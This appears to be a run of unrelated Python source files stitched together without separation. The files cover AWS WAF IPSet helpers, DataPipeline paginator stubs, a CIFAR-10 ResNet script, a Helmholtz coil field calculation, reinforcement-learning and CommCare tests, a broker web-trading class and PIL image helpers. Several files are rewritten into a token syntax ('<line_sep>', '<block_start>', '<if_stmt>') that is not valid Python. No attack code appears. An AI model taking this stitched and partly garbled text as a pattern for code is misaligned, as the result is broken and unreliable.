    Returns the service response, or None on failure (the error is logged).
    """
    try:
        response = client.create_ip_set(
            Scope=scope,
            Name=name,
            Description=description,
            IPAddressVersion=version,
            Addresses=addresses
        )
        return response
    except Exception as e:
        log.error("Failed to create IPSet: %s", str(name))
        log.error(str(e))
        return None

@on_exception(expo,
              (client.exceptions.WAFInternalErrorException,
               client.exceptions.WAFOptimisticLockException,
               client.exceptions.WAFAssociatedItemException),
              max_time=MAX_TIME)
def delete_ip_set(self, log, scope, name, ip_set_id):
    """Delete an IPSet (test helper).

    Fetches the IPSet first to obtain the required lock token.  Returns the
    last service response (None if the IPSet was not found or on error).
    """
    try:
        response = self.get_ip_set(log, scope, name, ip_set_id)
        if response is not None:
            lock_token = response['LockToken']
            response = client.delete_ip_set(
                Scope=scope,
                Name=name,
                LockToken=lock_token,
                Id=ip_set_id
            )
        return response
    except Exception as e:
        log.error("Failed to delete IPSet: %s", str(name))
        log.error(str(e))
        return None

@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def list_ip_sets(self, log, scope, marker=None):
    """List up to 50 IPSets in the scope; pass ``marker`` to resume pagination.

    Returns the service response, or None on failure (the error is logged).
    """
    try:
        # Idiom fix: compare against None with `is`, not `==`.
        if marker is None:
            response = client.list_ip_sets(Scope=scope, Limit=50)
        else:
            response = client.list_ip_sets(Scope=scope, NextMarker=marker, Limit=50)
        return response
    except Exception as e:
        log.error("Failed to list IPSets in scope: %s", str(scope))
        log.error(str(e))
        return None
from typing import Dict
from typing import List

from botocore.paginate import Paginator


class DescribeObjects(Paginator):
    """Paginator for :py:meth:`DataPipeline.Client.describe_objects`."""

    def paginate(self, pipelineId: str, objectIds: List, evaluateExpressions: bool = None, PaginationConfig: Dict = None) -> Dict:
        """Iterate over pages of pipeline object definitions.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/DescribeObjects>`_

        :param pipelineId: **[REQUIRED]** ID of the pipeline that contains the
            object definitions.
        :param objectIds: **[REQUIRED]** IDs of the pipeline objects to
            describe; at most 25 identifiers per call.
        :param evaluateExpressions: whether expressions in the objects should
            be evaluated when the descriptions are returned.
        :param PaginationConfig: optional dict with ``MaxItems``, ``PageSize``
            and ``StartingToken`` controlling pagination.
        :returns: pages shaped like::

            {
                'pipelineObjects': [
                    {'id': 'string',
                     'name': 'string',
                     'fields': [
                         {'key': 'string',
                          'stringValue': 'string',
                          'refValue': 'string'},
                     ]},
                ],
                'hasMoreResults': True|False,
                'NextToken': 'string'
            }

            Each field is a key-value pair whose value is either a string
            (``stringValue``) or a reference to another object (``refValue``),
            but never both.
        """
        pass


class ListPipelines(Paginator):
    """Paginator for :py:meth:`DataPipeline.Client.list_pipelines`."""

    def paginate(self, PaginationConfig: Dict = None) -> Dict:
        """Iterate over pages of pipeline identifiers.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/ListPipelines>`_

        :param PaginationConfig: optional dict with ``MaxItems``, ``PageSize``
            and ``StartingToken`` controlling pagination.
        :returns: pages shaped like::

            {
                'pipelineIdList': [
                    {'id': 'string', 'name': 'string'},
                ],
                'hasMoreResults': True|False,
                'NextToken': 'string'
            }

            ``id`` is assigned by AWS Data Pipeline and has the form
            ``df-297EG78HU43EEXAMPLE``; the identifiers can be fed to
            DescribePipelines and GetPipelineDefinition.
        """
        pass


class QueryObjects(Paginator):
    """Paginator for :py:meth:`DataPipeline.Client.query_objects`."""

    def paginate(self, pipelineId: str, sphere: str, query: Dict = None, PaginationConfig: Dict = None) -> Dict:
        """Iterate over pages of object IDs matching a query.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/QueryObjects>`_

        :param pipelineId: **[REQUIRED]** ID of the pipeline.
        :param sphere: **[REQUIRED]** whether the query applies to
            ``COMPONENT``, ``INSTANCE`` or ``ATTEMPT`` objects.
        :param query: dict with a ``selectors`` list (at most ten); an object
            must satisfy every selector to match.  Each selector has a
            ``fieldName`` and an ``operator`` dict with ``type`` (one of
            ``EQ``, ``REF_EQ``, ``LE``, ``GE``, ``BETWEEN``) and ``values``.
            ``REF_EQ`` applies only to reference fields; the other comparison
            types apply only to String fields.  ``EQ``/``REF_EQ`` act on
            name, @sphere, parent, @componentParent, @instanceParent, @status,
            @scheduledStartTime, @scheduledEndTime, @actualStartTime and
            @actualEndTime; ``GE``/``LE``/``BETWEEN`` act on the four time
            fields only.  Fields beginning with ``@`` are read-only and set by
            the web service; user-defined fields should be prefixed ``my``.
        :param PaginationConfig: optional dict with ``MaxItems``, ``PageSize``
            and ``StartingToken`` controlling pagination.
        :returns: pages shaped like::

            {
                'ids': ['string'],
                'hasMoreResults': True|False,
                'NextToken': 'string'
            }
        """
        pass
import tinyflow as tf
from tinyflow.datasets import get_cifar10
import numpy as np

num_epoch = 10
num_batch = 600
batch_size = 100


def conv_factory(x, filter_size, in_filters, out_filters):
    """Convolution -> batch norm -> ReLU."""
    out = tf.nn.conv2d(x, num_filter=out_filters,
                       ksize=[1, filter_size, filter_size, 1], padding='SAME')
    out = tf.nn.batch_normalization(out)
    return tf.nn.relu(out)


def residual_factory(x, in_filters, out_filters):
    """Residual unit: two 3x3 convs plus a (possibly projected) shortcut."""
    body = conv_factory(conv_factory(x, 3, in_filters, out_filters),
                        3, out_filters, out_filters)
    if in_filters == out_filters:
        shortcut = x
    else:
        # Channel counts differ: project the input with a 1x1 conv.
        shortcut = conv_factory(x, 1, in_filters, out_filters)
    return tf.nn.relu(shortcut + body)


def resnet(x, n, in_filters, out_filters):
    """Stack three stages of n residual units, with 16, 32 and 64 filters.

    Note: ``out_filters`` is accepted for symmetry but the stage widths are
    fixed at 16/32/64, matching the original network definition.
    """
    prev = in_filters
    for width in (16, 32, 64):
        for i in range(n):
            x = residual_factory(x, prev if i == 0 else width, width)
        prev = width
    return x


# Build the network graph: stem conv -> tanh -> resnet -> pool -> conv -> fc.
x = tf.placeholder(tf.float32)
net = tf.nn.conv2d(x, num_filter=16, ksize=[1, 5, 5, 1], padding='SAME')
net = tf.tanh(net)
net = resnet(net, 1, 16, 64)
net = tf.nn.avg_pool(net, ksize=[1, 4, 4, 1], strides=[1, 2, 2, 1],
                     padding='SAME', data_format='NCHW')
net = tf.nn.conv2d(net, num_filter=16, ksize=[1, 5, 5, 1])
net = tf.nn.flatten_layer(net)
fc1 = tf.nn.linear(net, num_hidden=10, name="fc1")

# define loss
label = tf.placeholder(tf.float32)
cross_entropy = tf.nn.mean_sparse_softmax_cross_entropy_with_logits(fc1, label)
train_step = tf.train.AdamOptimizer(0.0005).minimize(cross_entropy)

sess = tf.Session(config='gpu')

# Automatic variable shape inference API: infers the shapes and
# initializes the weights with Gaussian noise.
known_shape = {x: [batch_size, 3, 32, 32], label: [batch_size]}
stdev = 0.01
init_step = []
for v, name, shape in tf.infer_variable_shapes(cross_entropy, feed_dict=known_shape):
    init_step.append(tf.assign(v, tf.normal(shape, stdev)))
    print("shape[%s]=%s" % (name, str(shape)))
sess.run(init_step)
sess.run(tf.initialize_all_variables())

# get the cifar dataset
cifar = get_cifar10()

for epoch in range(num_epoch):
    running_loss = 0.0
    for _ in range(num_batch):
        batch_xs, batch_ys = cifar.train.next_batch(batch_size)
        loss, _ = sess.run([cross_entropy, train_step],
                           feed_dict={x: batch_xs, label: batch_ys})
        running_loss += loss
    print("epoch[%d] cross_entropy=%g" % (epoch, running_loss / num_batch))

correct_prediction = tf.equal(tf.argmax(fc1, 1), label)
accuracy = tf.reduce_mean(correct_prediction)
print(sess.run(accuracy, feed_dict={x: cifar.test.images, label: cifar.test.labels}))
<import_from_stmt>.colorpicker MDColorPicker# NOQA F401
""" * Copyright 2007,2008,2009 <NAME> * Copyright (C) 2009 <NAME> <<EMAIL>> * * Licensed under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at: * * http:#www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, * either express or implied. See the License for the specific * language governing permissions and limitations under the * License. * """<line_sep>"""* * Defines how the <tt>update</tt> method updates the touched * point, that is, the point the user is considered to be * hovered over. * * @see #update(TouchedPointUpdateOption) update * """<class_stmt>TouchedPointUpdateOption(object)<block_start><def_stmt>__init__ self<block_start><pass><block_end><block_end>"""* * When this option is passed to the update method, any * touched point is cleared as a consequence of the update. * <p> * * This option can be used when you want to "start fresh" * with regards to hover feedback after an update, and want * to assure that only explicit user-generated mouse move * actions (rather than objects moving <i>underneath</i> a * fixed-position mouse cursor) can trigger hover feedback. * * @see #update update * @see #TOUCHED_POINT_LOCKED TOUCHED_POINT_LOCKED * @see #TOUCHED_POINT_UPDATED TOUCHED_POINT_UPDATED * """<line_sep>TOUCHED_POINT_CLEARED=TouchedPointUpdateOption()<line_sep>"""* * When this option is passed to the update method, any * previously touched point is locked in (remains unchanged). 
* <p> * * For example, if the mouse is over a certain point before * the update, and that point moves away from the mouse * (without the mouse moving otherwise) as a consequence of * the update, the hover feedback remains "locked in" to the * original point, even though the mouse is no longer on top * of that point. * <p> * * This option is useful for hover widgets that modify the * position, size, symbol of points/curves, and do not want the * selected point/curve (and popup hover widget) to change as * a consequence of such changes. * <p> * * <i>Note:</i> If the currently touched point or the curve * containing it is deleted, GChart sets the touched point * reference to <tt>None</tt>. In that case, this option and * <tt>TOUCHED_POINT_CLEARED</tt> behave the same way. * * * @see #update update * @see #TOUCHED_POINT_CLEARED TOUCHED_POINT_CLEARED * @see #TOUCHED_POINT_UPDATED TOUCHED_POINT_UPDATED * """<line_sep>TOUCHED_POINT_LOCKED=TouchedPointUpdateOption()<line_sep>"""* * When this option is passed to the update method, the * touched point is updated so that it reflects whatever point * is underneath the mouse cursor after the update * completes. * <p> * * For example, if the mouse is not hovering over any point * before the update, but the update repositions one of the * points so that it is now underneath the mouse cursor, * the hover feedback for that point will be displayed. * Similarly, if the update moves a point away from the * mouse cursor, previously displayed hover feedback will * be eliminated. * <p> * * @see #update update * @see #TOUCHED_POINT_CLEARED TOUCHED_POINT_CLEARED * @see #TOUCHED_POINT_LOCKED TOUCHED_POINT_LOCKED * """<line_sep>TOUCHED_POINT_UPDATED=TouchedPointUpdateOption()<line_sep>
""" Helmoltz coils ============== A script that computes the magnetic field generated by a pair of Helmoltz coils. """<import_stmt>numpy<as>np<import_from_stmt>scipy special linalg<line_sep>############################################################################## # Function to caculate the field of a loop <def_stmt>base_vectors n<block_start>""" Returns 3 orthognal base vectors, the first one colinear to n. """<line_sep># normalize n n=n/np.sqrt(np.square(n).sum(axis=-1))<line_sep># choose two vectors perpendicular to n # choice is arbitrary since the coil is symetric about n <if_stmt>abs(n[0])<eq>1<block_start>l=np.r_[n[2] 0 -n[0]]<block_end><else_stmt><block_start>l=np.r_[0 n[2] -n[1]]<block_end>l=l/np.sqrt(np.square(l).sum(axis=-1))<line_sep>m=np.cross(n l)<line_sep><return>n l m<block_end><def_stmt>B_field r n r0 R<block_start>""" returns the magnetic field from an arbitrary current loop calculated from eqns (1) and (2) in Phys Rev A Vol. 35, N 4, pp. 1535-1546; 1987. Parameters ---------- n is normal vector to the plane of the loop at the center, current is oriented by the right-hand-rule. r is a position vector where the Bfield is evaluated: [x1 y2 z3 ; x2 y2 z2 ; ... 
] r is in units of d r0 is the location of the center of the loop in units of d: [x y z] R is the radius of the loop Returns ------- B is a vector for the B field at point r in inverse units of (mu I) / (2 pi d) for I in amps and d in meters and mu = 4 pi * 10^-7 we get Tesla """<line_sep>### Translate the coordinates in the coil's frame n,l,m=base_vectors(n)<line_sep># transformation matrix coil frame to lab frame trans=np.vstack((l m n))<line_sep># transformation matrix to lab frame to coil frame inv_trans=linalg.inv(trans)<line_sep>r=r-r0#point location from center of coil r=np.dot(r inv_trans)#transform vector to coil frame #### calculate field # express the coordinates in polar form x=r[: 0]<line_sep>y=r[: 1]<line_sep>z=r[: 2]<line_sep>rho=np.sqrt(x<power>2+y<power>2)<line_sep>theta=np.arctan(x/y)<line_sep># NaNs are generated where y is zero. theta[y<eq>0]=np.pi/2<line_sep>E=special.ellipe((4<times>R<times>rho)/((R+rho)<power>2+z<power>2))<line_sep>K=special.ellipk((4<times>R<times>rho)/((R+rho)<power>2+z<power>2))<line_sep>dist=((R-rho)<power>2+z<power>2)<line_sep>Bz=1/np.sqrt((R+rho)<power>2+z<power>2)<times>(K+E<times>(R<power>2-rho<power>2-z<power>2)/dist)<line_sep>Brho=z/(rho<times>np.sqrt((R+rho)<power>2+z<power>2))<times>(-K+E<times>(R<power>2+rho<power>2+z<power>2)/dist)<line_sep># On the axis of the coil we get a divided by zero here. 
This returns a # NaN, where the field is actually zero : Brho[dist<eq>0]=0<line_sep>Brho[rho<eq>0]=0<line_sep>Bz[dist<eq>0]=0<line_sep>B=np.c_[np.cos(theta)<times>Brho np.sin(theta)<times>Brho Bz]<line_sep># Rotate the field back in the lab's frame B=np.dot(B trans)<line_sep><return>B<block_end>############################################################################## # The grid of points on which we want to evaluate the field X,Y,Z=np.mgrid[-0.15:0.15:31j -0.15:0.15:31j -0.15:0.15:31j]<line_sep># Avoid rounding issues : f=1e4# this gives the precision we are interested in: X=np.round(X<times>f)/f<line_sep>Y=np.round(Y<times>f)/f<line_sep>Z=np.round(Z<times>f)/f<line_sep># The (x, y, z) position vector r=np.c_[np.ravel(X) np.ravel(Y) np.ravel(Z)]<line_sep>############################################################################## # The coil positions # The center of the coil r0=np.r_[0 0 0.1]<line_sep># The normal to the coils n=np.r_[0 0 1]<line_sep># The radius R=0.1<line_sep># Add the mirror image of this coils relatively to the xy plane : r0=np.vstack((r0 -r0))<line_sep>R=np.r_[R R]<line_sep>n=np.vstack((n n))# Helmoltz like configuration ############################################################################## # Calculate field # First initialize a container matrix for the field vector : B=np.zeros_like(r)<line_sep># Then loop through the different coils and sum the fields : <for_stmt>this_n,this_r0,this_R zip(n r0 R)<block_start>this_n=np.array(this_n)<line_sep>this_r0=np.array(this_r0)<line_sep>this_R=np.array(this_R)<line_sep>B<augadd>B_field(r this_n this_r0 this_R)<block_end>
# Copyright (c) 2021 Horizon Robotics and ALF Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from functools import partial

import torch

import alf
from alf.algorithms.off_policy_algorithm import OffPolicyAlgorithm
from alf.data_structures import AlgStep, LossInfo
from alf.tensor_specs import TensorSpec


class MyOffPolicyAlgorithm(OffPolicyAlgorithm):
    """Minimal off-policy algorithm exercising rollout/train state handling.

    Rollout state counts down from zero; train state counts up.  The rollout
    step asserts that every environment reset (``is_first``) arrives with a
    zeroed rollout state.
    """

    def __init__(self,
                 observation_spec,
                 action_spec,
                 reward_spec=None,
                 env=None,
                 config=None,
                 debug_summaries=False):
        super().__init__(
            env=env,
            config=config,
            debug_summaries=debug_summaries,
            observation_spec=observation_spec,
            action_spec=action_spec,
            train_state_spec=TensorSpec(shape=(2, )),
            rollout_state_spec=TensorSpec(shape=(), dtype=torch.int32))

    def rollout_step(self, inputs, state):
        print("rollout_step: ", state)
        # Wherever a new episode starts, the rollout state must still be zero.
        assert torch.all((state == 0)[inputs.is_first()])
        return AlgStep(output=inputs.prev_action, state=state - 1)

    def train_step(self, inputs, state, rollout_info):
        print("train_step: ", state)
        return AlgStep(output=inputs.prev_action, state=state + 1)

    def calc_loss(self, info):
        return LossInfo()


alf.config('create_environment', num_parallel_environments=10)

alf.config(
    'TrainerConfig',
    algorithm_ctor=MyOffPolicyAlgorithm,
    whole_replay_buffer_training=False,
    use_rollout_state=False,
    mini_batch_length=2,
    unroll_length=3,
    mini_batch_size=4,
    num_updates_per_train_iter=1,
    num_iterations=1)
import ssl
import random
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.poolmanager import PoolManager

from .DyTrader import *


class Ssl3HttpAdapter(HTTPAdapter):
    """Transport adapter that pins the connection pool to TLSv1."""

    def init_poolmanager(self, connections, maxsize, block=False):
        self.poolmanager = PoolManager(
            num_pools=connections,
            maxsize=maxsize,
            block=block,
            ssl_version=ssl.PROTOCOL_TLSv1)


class WebTrader(DyTrader):
    """Base class for broker web trading interfaces."""

    name = 'Web'

    heartBeatTimer = 60
    pollingCurEntrustTimer = 1

    maxRetryNbr = 3  # maximum number of retries

    def __init__(self, eventEngine, info, configFile=None, accountConfigFile=None):
        super().__init__(eventEngine, info, configFile, accountConfigFile)

        self._httpAdapter = None

    def _preLogin(self):
        # Start a fresh HTTP session for this login, mounting the custom
        # HTTPS adapter when one is configured.
        self._session = requests.session()
        if self._httpAdapter is not None:
            self._session.mount('https://', self._httpAdapter())

        # session headers
        self._session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
        })

    def _postLogout(self):
        self._session.close()
from datetime import datetime

from django.test.testcases import TestCase
from mock import patch

from corehq.form_processor.interfaces.dbaccessors import CaseAccessors
from corehq.form_processor.models import CommCareCaseSQL
from corehq.motech.repeater_helpers import get_relevant_case_updates_from_form_json


class TestRepeaterHelpers(TestCase):
    """Tests for get_relevant_case_updates_from_form_json case-type filtering."""

    def setUp(self):
        self.domain = 'test-domain'
        self.extra_fields = []
        self.form_question_values = {}

        self.case_1 = create_commcare_case({
            'case_id': '5ca13e74-8ba3-4d0d-l09j-66371e8895dd',
            'domain': self.domain,
            'type': 'paciente',
            'name': 'case1',
            'owner_id': 'owner_1',
            'modified_by': 'modified_by',
        })
        self.case_2 = create_commcare_case({
            'case_id': '6ca13e74-8ba3-4d0d-l09j-66371e8895dc',
            'domain': self.domain,
            'type': 'casa',
            'name': 'case2',
            'owner_id': 'owner_2',
            'modified_by': 'modified_by',
        })

    def tearDown(self):
        self.case_1.delete()
        self.case_2.delete()

    @patch.object(CaseAccessors, 'get_cases')
    def test__get_relevant_case_updates_from_form_json_with_case_types(self, get_cases):
        get_cases.return_value = [self.case_1, self.case_2]
        result = get_relevant_case_updates_from_form_json(
            self.domain, _get_form_json(), ['paciente'], self.extra_fields)
        self.assertEqual(len(result), 2)

    @patch.object(CaseAccessors, 'get_cases')
    def test__get_relevant_case_updates_from_form_json_without_case_types(self, get_cases):
        get_cases.return_value = [self.case_1, self.case_2]
        result = get_relevant_case_updates_from_form_json(
            self.domain, _get_form_json(), [], self.extra_fields)
        self.assertEqual(len(result), 3)


def create_commcare_case(data):
    """Persist and return a CommCareCaseSQL built from ``data``."""
    case = CommCareCaseSQL(
        case_id=data['case_id'],
        domain=data['domain'],
        type=data['type'],
        name=data['name'],
        owner_id=data['owner_id'],
        modified_by=data['modified_by'],
        modified_on=datetime.utcnow(),
        server_modified_on=datetime.utcnow(),
    )
    case.save()
    return case


def _get_form_json():
    # Anonymized copy of a real form submission payload.
    return {
        'app_id': 'APP_ID',
        'archived': False,
        'attachments': {
            'form.xml': {
                'content_type': 'text/xml',
                'length': 10975,
                'url': 'https://www.commcarehq.org/a/infomovel-pepfar'
                       '/api/form/attachment/CONFIDENTIAL/form.xml'
            }
        },
        'build_id': 'BUILD_ID',
        'domain': 'infomovel-pepfar',
        'edited_by_user_id': None,
        'edited_on': None,
        'form': {
            '#type': 'data',
            '@name': 'SOME NAME',
            '@uiVersion': '1',
            '@version': 'VERSION',
            '@xmlns': 'http://openrosa.org/formdesigner/IDIDID',
            'casa_data': {
                'convivente_cascade': {},
                'conviventes_names': {},
                'index_cascade': {},
                'save_to_case': {
                    'alocar_paciente_casa': {
                        'case': {
                            '@case_id': '5ca13e74-8ba3-4d0d-l09j-66371e8895dd',
                            '@date_modified': '2021-06-24T08:43:06.746000Z',
                            '@user_id': 'USER ID',
                            '@xmlns': 'http://commcarehq.org/case/transaction/v2',
                            'index': {
                                'parent': {
                                    '#text': '6ca13e74-8ba3-4d0d-l09j-66371e8895dc',
                                    '@case_type': '',
                                    '@relationship': 'child'
                                }
                            }
                        }
                    },
                    'criar_actualizar_casa': {
                        'case': {
                            '@case_id': '6ca13e74-8ba3-4d0d-l09j-66371e8895dc',
                            '@date_modified': '2021-05-24T08:43:06.746000Z',
                            '@user_id': 'USER ID',
                            '@xmlns': 'http://commcarehq.org/case/transaction/v2',
                            'create': {
                                'case_name': 'CASE NAME',
                                'case_type': 'casa',
                                'owner_id': 'owner_1'
                            },
                            'update': {
                                'age_range1': '25-30',
                                'age_range2': '25-30 anos',
                            }
                        }
                    }
                },
                'tb_patient_in_household': '0'
            },
            'case': {
                '@case_id': '5ca13e74-8ba3-4d0d-l09j-66371e8895dd',
                '@date_modified': '2021-06-24T08:43:06.746000Z',
                '@user_id': 'USER ID',
                '@xmlns': 'http://commcarehq.org/case/transaction/v2',
                'update': {'name': '<NAME>'}
            },
            'confirm_info': {},
            'confirmar_perfil': {},
            'imported_properties': {},
            'indicators_v4': {},
            'key_workflow_properties': {},
            'meta': {},
            'patient_data': {},
        },
        'metadata': {},
    }
class PPSTimingCalibrationModeEnum:
    """Integer codes selecting where a PPS timing-calibration payload comes from."""
    # NOTE(review): semantics inferred from the attribute names — confirm with callers.
    CondDB = 0   # conditions database
    JSON = 1     # JSON file
    SQLite = 2   # SQLite file
import turbodbc.data_types
from turbodbc import STRING, BINARY, NUMBER, DATETIME, ROWID

# Every internal ODBC type code the driver can report.
ALL_TYPE_CODES = [turbodbc.data_types._BOOLEAN_CODE,
                  turbodbc.data_types._INTEGER_CODE,
                  turbodbc.data_types._FLOATING_POINT_CODE,
                  turbodbc.data_types._STRING_CODE,
                  turbodbc.data_types._UNICODE_CODE,
                  turbodbc.data_types._TIMESTAMP_CODE,
                  turbodbc.data_types._DATE_CODE]

# The PEP 249 type objects exposed by turbodbc.
ALL_DATA_TYPES = [STRING, BINARY, NUMBER, DATETIME, ROWID]


def test_each_type_code_matches_one_data_type():
    # Each internal code must compare equal to exactly one DB API type object.
    for code in ALL_TYPE_CODES:
        assert sum(1 for data_type in ALL_DATA_TYPES if code == data_type) == 1


def test_each_type_code_mismatches_all_but_one_data_type():
    # Conversely, each code must compare unequal to all remaining type objects.
    for code in ALL_TYPE_CODES:
        mismatch_count = sum(1 for data_type in ALL_DATA_TYPES if code != data_type)
        assert mismatch_count == len(ALL_DATA_TYPES) - 1
""" ckwg +31 Copyright 2017 by Kitware, Inc. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither name of Kitware, Inc. nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ============================================================================== Helper functions for dealing with PIL """<import_from_stmt>kwiver.vital.types Image<import_stmt>six<def_stmt>_pil_image_to_bytes p_img<block_start>""" Get the component bytes from the given PIL Image. In recent version of PIL, the tobytes function is the correct thing to call, but some older versions of PIL do not have this function. :param p_img: PIL Image to get the bytes from. :type p_img: PIL.Image.Image :returns: Byte string. 
:rtype: bytes """<if_stmt>hasattr(p_img 'tobytes')<block_start><return>p_img.tobytes()<block_end><else_stmt># Older version of the function. <block_start><return>p_img.tostring()<block_end><block_end><def_stmt>_pil_image_from_bytes mode size data decoder_name='raw' *args<block_start>""" Creates a copy of an image memory from pixel data in a buffer. In recent versionf of PIL, the frombytes function is the correct thing to call, but older version fo PIL only have a fromstring, which is equivalent in function. :param mode: The image mode. See: :ref:`concept-modes`. :param size: The image size. :param data: A byte buffer containing raw data for the given mode. :param decoder_name: What decoder to use. :param args: Additional parameters for the given decoder. :returns: An :py:class:`~PIL.Image.Image` object. """<import_stmt>PIL.Image<if_stmt>hasattr(PIL.Image 'frombytes')<block_start><return>PIL.Image.frombytes(mode size data decoder_name *args)<block_end><else_stmt><block_start><return>PIL.Image.fromstring(mode size data decoder_name *args)<block_end><block_end><def_stmt>from_pil pil_image<block_start>""" Construct Image from supplied PIL image object. :param pil_image: PIL image object :type pil_image: PIL.Image.Image :raises RuntimeError: If the PIL Image provided is not in a recognized mode. :returns: New Image instance using the given image's pixels. :rtype: Image """<line_sep>(img_width img_height)=pil_image.size<line_sep>mode=pil_image.mode<line_sep># TODO(paul.tunison): Extract this logic out into a utility function. 
<if_stmt>mode<eq>"1"# boolean <block_start>img_depth=1<line_sep>img_w_step=1<line_sep>img_h_step=img_width<line_sep>img_d_step=0<line_sep>img_pix_num_bytes=1<line_sep>img_pix_type=Image.PIXEL_BOOL<block_end><elif_stmt>mode<eq>"L"# 8-bit greyscale <block_start>img_depth=1<line_sep>img_w_step=1<line_sep>img_h_step=img_width<line_sep>img_d_step=0<line_sep>img_pix_num_bytes=1<line_sep>img_pix_type=Image.PIXEL_UNSIGNED<block_end><elif_stmt>mode<eq>"RGB"# 8-bit RGB <block_start>img_depth=3<line_sep>img_w_step=3<line_sep>img_h_step=img_width<times>3<line_sep>img_d_step=1<line_sep>img_pix_num_bytes=1<line_sep>img_pix_type=Image.PIXEL_UNSIGNED<block_end><elif_stmt>mode<eq>"RGBA"# 8-bit RGB with alpha <block_start>img_depth=4<line_sep>img_w_step=4<line_sep>img_h_step=img_width<times>4<line_sep>img_d_step=1<line_sep>img_pix_num_bytes=1<line_sep>img_pix_type=Image.PIXEL_UNSIGNED<block_end><elif_stmt>mode<eq>"I"# 32-bit signed int greyscale <block_start>img_depth=1<line_sep>img_w_step=1<line_sep>img_h_step=img_width<line_sep>img_d_step=0<line_sep>img_pix_num_bytes=4<line_sep>img_pix_type=Image.PIXEL_SIGNED<block_end><elif_stmt>mode<eq>"F"# 32-bit float greyscale <block_start>img_depth=1<line_sep>img_w_step=1<line_sep>img_h_step=img_width<line_sep>img_d_step=0<line_sep>img_pix_num_bytes=4<line_sep>img_pix_type=Image.PIXEL_FLOAT<block_end><else_stmt><block_start><raise>RuntimeError("Unsupported image format.")<block_end>img_data=_pil_image_to_bytes(pil_image)<line_sep>vital_img=Image(img_data img_width img_height img_depth img_w_step img_h_step img_d_step img_pix_type img_pix_num_bytes)<line_sep><return>vital_img<block_end><def_stmt>get_pil_image img<block_start>""" Get image in python friendly format Assumptions are that the image has byte pixels. :return: array containing image :rtype: pil image """<def_stmt>pil_mode_from_image img<block_start>""" Determine image format from pixel properties May return None if our current encoding does not map to a PIL image mode. 
"""<if_stmt>img.pixel_type()<eq>img.PIXEL_UNSIGNED<and>img.pixel_num_bytes()<eq>1<block_start><if_stmt>img.depth()<eq>3<and>img.d_step()<eq>1<and>img.w_step()<eq>3<block_start><return>"RGB"<block_end><elif_stmt>img.depth()<eq>4<and>img.d_step()<eq>1<and>img.w_step()<eq>4<block_start><return>"RGBA"<block_end><elif_stmt>img.depth()<eq>1<and>img.w_step()<eq>1<block_start><return>"L"<block_end><block_end><elif_stmt>img.depth()<eq>1<and>img.w_step()<eq>1<block_start><if_stmt>img.pixel_type()<eq>img.PIXEL_BOOL<and>img.pixel_num_bytes()<eq>1<block_start><return>"1"<block_end><elif_stmt>img.pixel_type()<eq>img.PIXEL_SIGNED<and>img.pixel_num_bytes()<eq>4<block_start><return>"I"<block_end><elif_stmt>img.pixel_type()<eq>img.PIXEL_FLOAT<and>img.pixel_num_bytes()<eq>4<block_start><return>"F"<block_end><block_end><return><none><block_end>mode=pil_mode_from_image(img)<if_stmt><not>mode# make a copy of this image using contiguous memory with interleaved channels <block_start>new_img=Image(img.width() img.height() img.depth() <true> img.pixel_type() img.pixel_num_bytes())<line_sep>new_img.copy_from(img)<line_sep>img=new_img<line_sep>mode=pil_mode_from_image(img)<block_end><if_stmt><not>mode<block_start><raise>RuntimeError("Unsupported image format.")<block_end># get buffer from image <if_stmt>six.PY2<block_start>img_pixels=buffer(bytearray(img))<block_end><else_stmt><block_start>img_pixels=memoryview(bytearray(img)).tobytes()<block_end>pil_img=_pil_image_from_bytes(mode (img.width() img.height()) img_pixels "raw" mode img.h_step()<times>img.pixel_num_bytes() 1)<line_sep><return>pil_img<block_end>